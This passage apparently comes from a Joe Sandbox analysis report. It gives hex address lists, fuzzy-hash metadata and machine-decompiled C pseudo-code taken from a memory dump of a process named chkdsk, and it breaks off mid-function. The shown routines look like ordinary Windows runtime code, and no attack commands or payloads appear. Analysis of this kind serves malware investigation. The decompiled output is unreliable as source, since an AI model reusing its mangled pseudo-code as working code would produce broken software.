                                                      0x04e4e7c7
                                                      0x04e4e806
                                                      0x00000000
                                                      0x04e4e7c9
                                                      0x04e4e7d1
                                                      0x04e4e7d8
                                                      0x00000000
                                                      0x04e4e7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e722
                                                      0x04e4e72e
                                                      0x04e4e748
                                                      0x04e4e74c
                                                      0x04e4e754
                                                      0x04e4e756
                                                      0x04e4e75c
                                                      0x04e4e75c
                                                      0x00000000
                                                      0x04e4e75c
                                                      0x04e4e758
                                                      0x04e4e758
                                                      0x00000000
                                                      0x04e4e758
                                                      0x04e4e750
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e752
                                                      0x00000000
                                                      0x04e4e752
                                                      0x04e4e730
                                                      0x04e4e735
                                                      0x04e4e73d
                                                      0x04e4e73f
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e741
                                                      0x04e4e741
                                                      0x00000000
                                                      0x04e4e741
                                                      0x04e4e739
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4e73b
                                                      0x00000000
                                                      0x04e4e73b
                                                      0x04e4e722
                                                      0x04e4e720
                                                      0x04e4e6b0
                                                      0x04e4e618
                                                      0x00000000
                                                      0x04e4e618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: f0d7eee06c8d1dfbdc1821004ed0efc0d4233cb14dd2520ddb8e133a3f426897
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: A0916A326043419BE724CF29D845B6BB7E5BFC4728F14992DF999CA280E774F904CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E04E051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed short* _t63;
                                                      				signed int _t64;
                                                      				signed int _t65;
                                                      				signed int _t67;
                                                      				intOrPtr _t74;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t88;
                                                      				intOrPtr _t94;
                                                      				void* _t100;
                                                      				void* _t103;
                                                      				intOrPtr _t105;
                                                      				signed int _t106;
                                                      				short* _t108;
                                                      				signed int _t110;
                                                      				signed int _t113;
                                                      				signed int* _t115;
                                                      				signed short* _t117;
                                                      				void* _t118;
                                                      				void* _t119;
                                                      
                                                      				_push(0x80);
                                                      				_push(0x4e605f0);
                                                      				E04DDD0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                      				_t115 =  *(_t118 + 0xc);
                                                      				 *(_t118 - 0x7c) = _t115;
                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                      				_t113 = 0;
                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                      				_t100 = __ecx;
                                                      				if(_t100 == 0) {
                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                      					E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                      					_t63 =  *(_t118 - 0x90);
                                                      					_t101 = _t63[2];
                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                      					L20:
                                                      					_t65 = _t64 >> 1;
                                                      					L21:
                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                      					if(_t108 == 0) {
                                                      						L27:
                                                      						 *_t115 = _t65 + 1;
                                                      						_t67 = 0xc0000023;
                                                      						L28:
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                      						L29:
                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                      						E04E053CA(0);
                                                      						return E04DDD130(0, _t113, _t115);
                                                      					}
                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                      							 *_t108 = 0;
                                                      						}
                                                      						goto L27;
                                                      					}
                                                      					 *_t115 = _t65;
                                                      					_t115 = _t65 + _t65;
                                                      					E04DCF3E0(_t108, _t101, _t115);
                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                      					_t67 = 0;
                                                      					goto L28;
                                                      				}
                                                      				_t103 = _t100 - 1;
                                                      				if(_t103 == 0) {
                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                      					_t74 = E04DA3690(1, _t117, 0x4d61810, _t118 - 0x74);
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                      					_t101 = _t117[2];
                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                      					if(_t74 < 0) {
                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                      						_t115 =  *(_t118 - 0x7c);
                                                      						goto L20;
                                                      					}
                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                      					_t115 =  *(_t118 - 0x7c);
                                                      					goto L21;
                                                      				}
                                                      				if(_t103 == 1) {
                                                      					_t105 = 4;
                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                      					_push(_t118 - 0x70);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(_t105);
                                                      					_push(_t118 - 0x78);
                                                      					_push(0x6b);
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E04DCAA90();
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                      					_t113 = L04DA4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                      					if(_t113 != 0) {
                                                      						_push(_t118 - 0x70);
                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                      						_push(_t113);
                                                      						_push(4);
                                                      						_push(_t118 - 0x78);
                                                      						_push(0x6b);
                                                      						_t84 = E04DCAA90();
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                      						if(_t84 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t110 = 0;
                                                      						_t106 = 0;
                                                      						while(1) {
                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                      							 *(_t118 - 0x88) = _t106;
                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                      								break;
                                                      							}
                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                      							_t106 = _t106 + 1;
                                                      						}
                                                      						_t88 = E04E0500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                      						_t119 = _t119 + 0x1c;
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                      						if(_t88 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t101 = _t118 - 0x3c;
                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                      						goto L21;
                                                      					}
                                                      					_t67 = 0xc0000017;
                                                      					goto L28;
                                                      				}
                                                      				_push(0);
                                                      				_push(0x20);
                                                      				_push(_t118 - 0x60);
                                                      				_push(0x5a);
                                                      				_t94 = E04DC9860();
                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                      				if(_t94 < 0) {
                                                      					goto L29;
                                                      				}
                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                      					_t101 = L"Legacy";
                                                      					_push(6);
                                                      				} else {
                                                      					_t101 = L"UEFI";
                                                      					_push(4);
                                                      				}
                                                      				_pop(_t65);
                                                      				goto L21;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 72884abe94876f5372844118a67405ce9254b4591bcef864ffef0f4acaae4d77
                                                      • Instruction ID: 473a25dcbc0285113baf6a39d6f57a6400813efd1befb49859367fd0e1980578
                                                      • Opcode Fuzzy Hash: 72884abe94876f5372844118a67405ce9254b4591bcef864ffef0f4acaae4d77
                                                      • Instruction Fuzzy Hash: 72518D71A00609AFDB24DFA8C840BBDBBF9FF48704F54942DE559EB281E671A940CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E04DAB944(signed int* __ecx, char __edx) {
                                                      				signed int _v8;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				char _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				intOrPtr _v44;
                                                      				signed int* _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				intOrPtr _v68;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v76;
                                                      				char _v77;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr* _t65;
                                                      				intOrPtr _t67;
                                                      				intOrPtr _t68;
                                                      				char* _t73;
                                                      				intOrPtr _t77;
                                                      				intOrPtr _t78;
                                                      				signed int _t82;
                                                      				intOrPtr _t83;
                                                      				void* _t87;
                                                      				char _t88;
                                                      				intOrPtr* _t89;
                                                      				intOrPtr _t91;
                                                      				void* _t97;
                                                      				intOrPtr _t100;
                                                      				void* _t102;
                                                      				void* _t107;
                                                      				signed int _t108;
                                                      				intOrPtr* _t112;
                                                      				void* _t113;
                                                      				intOrPtr* _t114;
                                                      				intOrPtr _t115;
                                                      				intOrPtr _t116;
                                                      				intOrPtr _t117;
                                                      				signed int _t118;
                                                      				void* _t130;
                                                      
                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                      				_v8 =  *0x4e7d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                      				_t112 = __ecx;
                                                      				_v77 = __edx;
                                                      				_v48 = __ecx;
                                                      				_v28 = 0;
                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                      				_t105 =  *_t5;
                                                      				_v20 = 0;
                                                      				_v16 = 0;
                                                      				if(_t105 == 0) {
                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                      					_t60 =  *__ecx |  *_t50;
                                                      					if(( *__ecx |  *_t50) != 0) {
                                                      						 *__ecx = 0;
                                                      						__ecx[1] = 0;
                                                      						if(E04DA7D50() != 0) {
                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      						} else {
                                                      							_t65 = 0x7ffe0386;
                                                      						}
                                                      						if( *_t65 != 0) {
                                                      							E04E58CD6(_t112);
                                                      						}
                                                      						_push(0);
                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                      						_push( *_t52);
                                                      						_t60 = E04DC9E20();
                                                      					}
                                                      					L20:
                                                      					_pop(_t107);
                                                      					_pop(_t113);
                                                      					_pop(_t87);
                                                      					return E04DCB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                      				}
                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                      				_t67 =  *_t8;
                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                      				_t108 =  *(_t67 + 0x14);
                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                      				_t105 = 0x2710;
                                                      				asm("sbb eax, edi");
                                                      				_v44 = _t88;
                                                      				_v52 = _t108;
                                                      				_t60 = E04DCCE00(_t97, _t68, 0x2710, 0);
                                                      				_v56 = _t60;
                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                      					L3:
                                                      					 *(_t112 + 0x44) = _t60;
                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                      					 *_t112 = _t88;
                                                      					 *(_t112 + 4) = _t108;
                                                      					_v20 = _t60 * 0x2710;
                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                      					if(_v77 != 0) {
                                                      						L16:
                                                      						_v36 = _t88;
                                                      						_v32 = _t108;
                                                      						if(E04DA7D50() != 0) {
                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      						} else {
                                                      							_t73 = 0x7ffe0386;
                                                      						}
                                                      						if( *_t73 != 0) {
                                                      							_t105 = _v40;
                                                      							E04E58F6A(_t112, _v40, _t88, _t108);
                                                      						}
                                                      						_push( &_v28);
                                                      						_push(0);
                                                      						_push( &_v36);
                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                      						_push( *_t48);
                                                      						_t60 = E04DCAF60();
                                                      						goto L20;
                                                      					} else {
                                                      						_t89 = 0x7ffe03b0;
                                                      						do {
                                                      							_t114 = 0x7ffe0010;
                                                      							do {
                                                      								_t77 =  *0x4e78628; // 0x0
                                                      								_v68 = _t77;
                                                      								_t78 =  *0x4e7862c; // 0x0
                                                      								_v64 = _t78;
                                                      								_v72 =  *_t89;
                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                      								while(1) {
                                                      									_t105 =  *0x7ffe000c;
                                                      									_t100 =  *0x7ffe0008;
                                                      									if(_t105 ==  *_t114) {
                                                      										goto L8;
                                                      									}
                                                      									asm("pause");
                                                      								}
                                                      								L8:
                                                      								_t89 = 0x7ffe03b0;
                                                      								_t115 =  *0x7ffe03b0;
                                                      								_t82 =  *0x7FFE03B4;
                                                      								_v60 = _t115;
                                                      								_t114 = 0x7ffe0010;
                                                      								_v56 = _t82;
                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                      							_t83 =  *0x4e78628; // 0x0
                                                      							_t116 =  *0x4e7862c; // 0x0
                                                      							_v76 = _t116;
                                                      							_t117 = _v68;
                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                      						asm("sbb edx, [esp+0x24]");
                                                      						_t102 = _t100 - _v60 - _t117;
                                                      						_t112 = _v48;
                                                      						_t91 = _v44;
                                                      						asm("sbb edx, eax");
                                                      						_t130 = _t105 - _v52;
                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                      							_t88 = _t102 - _t91;
                                                      							asm("sbb edx, edi");
                                                      							_t108 = _t105;
                                                      						} else {
                                                      							_t88 = 0;
                                                      							_t108 = 0;
                                                      						}
                                                      						goto L16;
                                                      					}
                                                      				} else {
                                                      					if( *(_t112 + 0x44) == _t60) {
                                                      						goto L20;
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      			}


                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DAB9A5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: c5d9a60a14487415e9574b8c28dc16aa389094dec99d756c7f1ddb2ae0315c0a
                                                      • Instruction ID: ae04e161015eca2f43455cd26c6494d4080ccb19234e7d68614ee901238bd301
                                                      • Opcode Fuzzy Hash: c5d9a60a14487415e9574b8c28dc16aa389094dec99d756c7f1ddb2ae0315c0a
                                                      • Instruction Fuzzy Hash: 78517671A08341CFC720DF69C480A2ABBE9FB88714F14896EEA8587354E771F855CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E04D8B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                      				signed int _t65;
                                                      				signed short _t69;
                                                      				intOrPtr _t70;
                                                      				signed short _t85;
                                                      				void* _t86;
                                                      				signed short _t89;
                                                      				signed short _t91;
                                                      				intOrPtr _t92;
                                                      				intOrPtr _t97;
                                                      				intOrPtr* _t98;
                                                      				signed short _t99;
                                                      				signed short _t101;
                                                      				void* _t102;
                                                      				char* _t103;
                                                      				signed short _t104;
                                                      				intOrPtr* _t110;
                                                      				void* _t111;
                                                      				void* _t114;
                                                      				intOrPtr* _t115;
                                                      
                                                      				_t109 = __esi;
                                                      				_t108 = __edi;
                                                      				_t106 = __edx;
                                                      				_t95 = __ebx;
                                                      				_push(0x90);
                                                      				_push(0x4e5f7a8);
                                                      				E04DDD0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                      				if(__edx == 0xffffffff) {
                                                      					L6:
                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                      					__eflags = _t65 & 0x00000002;
                                                      					if((_t65 & 0x00000002) != 0) {
                                                      						L3:
                                                      						L4:
                                                      						return E04DDD130(_t95, _t108, _t109);
                                                      					}
                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                      					_t108 = 0;
                                                      					_t109 = 0;
                                                      					_t95 = 0;
                                                      					__eflags = 0;
                                                      					while(1) {
                                                      						__eflags = _t95 - 0x200;
                                                      						if(_t95 >= 0x200) {
                                                      							break;
                                                      						}
                                                      						E04DCD000(0x80);
                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                      						_t108 = _t115;
                                                      						_t95 = _t95 - 0xffffff80;
                                                      						_t17 = _t114 - 4;
                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                      						__eflags =  *_t17;
                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                      						_t102 = _t110 + 1;
                                                      						do {
                                                      							_t85 =  *_t110;
                                                      							_t110 = _t110 + 1;
                                                      							__eflags = _t85;
                                                      						} while (_t85 != 0);
                                                      						_t111 = _t110 - _t102;
                                                      						_t21 = _t95 - 1; // -129
                                                      						_t86 = _t21;
                                                      						__eflags = _t111 - _t86;
                                                      						if(_t111 > _t86) {
                                                      							_t111 = _t86;
                                                      						}
                                                      						E04DCF3E0(_t108, _t106, _t111);
                                                      						_t115 = _t115 + 0xc;
                                                      						_t103 = _t111 + _t108;
                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                      						_t89 = _t95 - _t111;
                                                      						__eflags = _t89;
                                                      						_push(0);
                                                      						if(_t89 == 0) {
                                                      							L15:
                                                      							_t109 = 0xc000000d;
                                                      							goto L16;
                                                      						} else {
                                                      							__eflags = _t89 - 0x7fffffff;
                                                      							if(_t89 <= 0x7fffffff) {
                                                      								L16:
                                                      								 *(_t114 - 0x94) = _t109;
                                                      								__eflags = _t109;
                                                      								if(_t109 < 0) {
                                                      									__eflags = _t89;
                                                      									if(_t89 != 0) {
                                                      										 *_t103 = 0;
                                                      									}
                                                      									L26:
                                                      									 *(_t114 - 0xa0) = _t109;
                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                      									__eflags = _t109;
                                                      									if(_t109 >= 0) {
                                                      										L31:
                                                      										_t98 = _t108;
                                                      										_t39 = _t98 + 1; // 0x1
                                                      										_t106 = _t39;
                                                      										do {
                                                      											_t69 =  *_t98;
                                                      											_t98 = _t98 + 1;
                                                      											__eflags = _t69;
                                                      										} while (_t69 != 0);
                                                      										_t99 = _t98 - _t106;
                                                      										__eflags = _t99;
                                                      										L34:
                                                      										_t70 =  *[fs:0x30];
                                                      										__eflags =  *((char*)(_t70 + 2));
                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                      											L40:
                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                      											 *(_t114 - 4) = 1;
                                                      											_push(_t114 - 0x74);
                                                      											L04DDDEF0(_t99, _t106);
                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                      											goto L3;
                                                      										}
                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                      											goto L40;
                                                      										}
                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                      										_push(_t99 & 0x0000ffff);
                                                      										_push(_t108);
                                                      										_push(1);
                                                      										_t101 = E04DCB280();
                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                      											__eflags = _t101 - 0x80000003;
                                                      											if(_t101 == 0x80000003) {
                                                      												E04DCB7E0(1);
                                                      												_t101 = 0;
                                                      												__eflags = 0;
                                                      											}
                                                      										}
                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                      										goto L4;
                                                      									}
                                                      									__eflags = _t109 - 0x80000005;
                                                      									if(_t109 == 0x80000005) {
                                                      										continue;
                                                      									}
                                                      									break;
                                                      								}
                                                      								 *(_t114 - 0x90) = 0;
                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                      								_t91 = E04DCE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                      								_t115 = _t115 + 0x10;
                                                      								_t104 = _t91;
                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                      								__eflags = _t104;
                                                      								if(_t104 < 0) {
                                                      									L21:
                                                      									_t109 = 0x80000005;
                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                      									L22:
                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                      									L23:
                                                      									 *(_t114 - 0x94) = _t109;
                                                      									goto L26;
                                                      								}
                                                      								__eflags = _t104 - _t92;
                                                      								if(__eflags > 0) {
                                                      									goto L21;
                                                      								}
                                                      								if(__eflags == 0) {
                                                      									goto L22;
                                                      								}
                                                      								goto L23;
                                                      							}
                                                      							goto L15;
                                                      						}
                                                      					}
                                                      					__eflags = _t109;
                                                      					if(_t109 >= 0) {
                                                      						goto L31;
                                                      					}
                                                      					__eflags = _t109 - 0x80000005;
                                                      					if(_t109 != 0x80000005) {
                                                      						goto L31;
                                                      					}
                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                      					_t38 = _t95 - 1; // -129
                                                      					_t99 = _t38;
                                                      					goto L34;
                                                      				}
                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                      					__eflags = __edx - 0x65;
                                                      					if(__edx != 0x65) {
                                                      						goto L2;
                                                      					}
                                                      					goto L6;
                                                      				}
                                                      				L2:
                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                      				_push(_t106);
                                                      				if(E04DCA890() != 0) {
                                                      					goto L6;
                                                      				}
                                                      				goto L3;
                                                      			}


                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: 98b5aa61dae69f8eae4b7d4823ed07f85c0a02fabc297879093510e77403f6b7
                                                      • Instruction ID: ad737f443e8e1e2c2d83363b90c107a646b14fad3ed22ea9886dc308fba1fc75
                                                      • Opcode Fuzzy Hash: 98b5aa61dae69f8eae4b7d4823ed07f85c0a02fabc297879093510e77403f6b7
                                                      • Instruction Fuzzy Hash: 5D51E271E002598EEF35EF658884BBEBBB1FF05714F1041ADE859AB281D7346941DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E04D9D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                      				signed int _v8;
                                                      				intOrPtr _v20;
                                                      				signed int _v36;
                                                      				intOrPtr* _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed char _v52;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				intOrPtr _v80;
                                                      				signed int _v84;
                                                      				intOrPtr _v100;
                                                      				intOrPtr _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				intOrPtr _v120;
                                                      				signed int _v132;
                                                      				char _v140;
                                                      				char _v144;
                                                      				char _v157;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v169;
                                                      				intOrPtr _v176;
                                                      				signed int _v180;
                                                      				intOrPtr _v184;
                                                      				intOrPtr _v188;
                                                      				signed int _v192;
                                                      				signed int _v200;
                                                      				signed int _v208;
                                                      				intOrPtr* _v212;
                                                      				char _v216;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t204;
                                                      				signed int _t206;
                                                      				void* _t208;
                                                      				signed int _t211;
                                                      				signed int _t216;
                                                      				intOrPtr _t217;
                                                      				intOrPtr* _t218;
                                                      				signed int _t226;
                                                      				signed int _t239;
                                                      				signed int* _t247;
                                                      				signed int _t249;
                                                      				void* _t252;
                                                      				signed int _t256;
                                                      				signed int _t269;
                                                      				signed int _t271;
                                                      				signed int _t277;
                                                      				intOrPtr _t279;
                                                      				intOrPtr _t283;
                                                      				signed int _t287;
                                                      				signed int _t288;
                                                      				void* _t289;
                                                      				signed char _t290;
                                                      				signed int _t292;
                                                      				signed int* _t293;
                                                      				unsigned int _t297;
                                                      				signed int _t306;
                                                      				signed int _t307;
                                                      				signed int _t308;
                                                      				signed int _t309;
                                                      				signed int _t310;
                                                      				intOrPtr _t311;
                                                      				intOrPtr _t312;
                                                      				signed int _t319;
                                                      				intOrPtr _t320;
                                                      				signed int* _t324;
                                                      				signed int _t337;
                                                      				signed int _t338;
                                                      				signed int _t339;
                                                      				intOrPtr* _t340;
                                                      				void* _t341;
                                                      				signed int _t344;
                                                      				signed int _t348;
                                                      				signed int _t349;
                                                      				signed int _t351;
                                                      				intOrPtr _t353;
                                                      				void* _t354;
                                                      				signed int _t356;
                                                      				signed int _t358;
                                                      				intOrPtr _t359;
                                                      				signed int _t361;
                                                      				signed int _t363;
                                                      				signed short* _t365;
                                                      				void* _t367;
                                                      				intOrPtr _t369;
                                                      				void* _t370;
                                                      				signed int _t371;
                                                      				signed int _t372;
                                                      				void* _t374;
                                                      				signed int _t376;
                                                      				void* _t384;
                                                      				signed int _t387;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t376;
                                                      				_t2 =  &_a20;
                                                      				 *_t2 = _a20 & 0x00000001;
                                                      				_t287 = _a4;
                                                      				_v200 = _a12;
                                                      				_t365 = _a8;
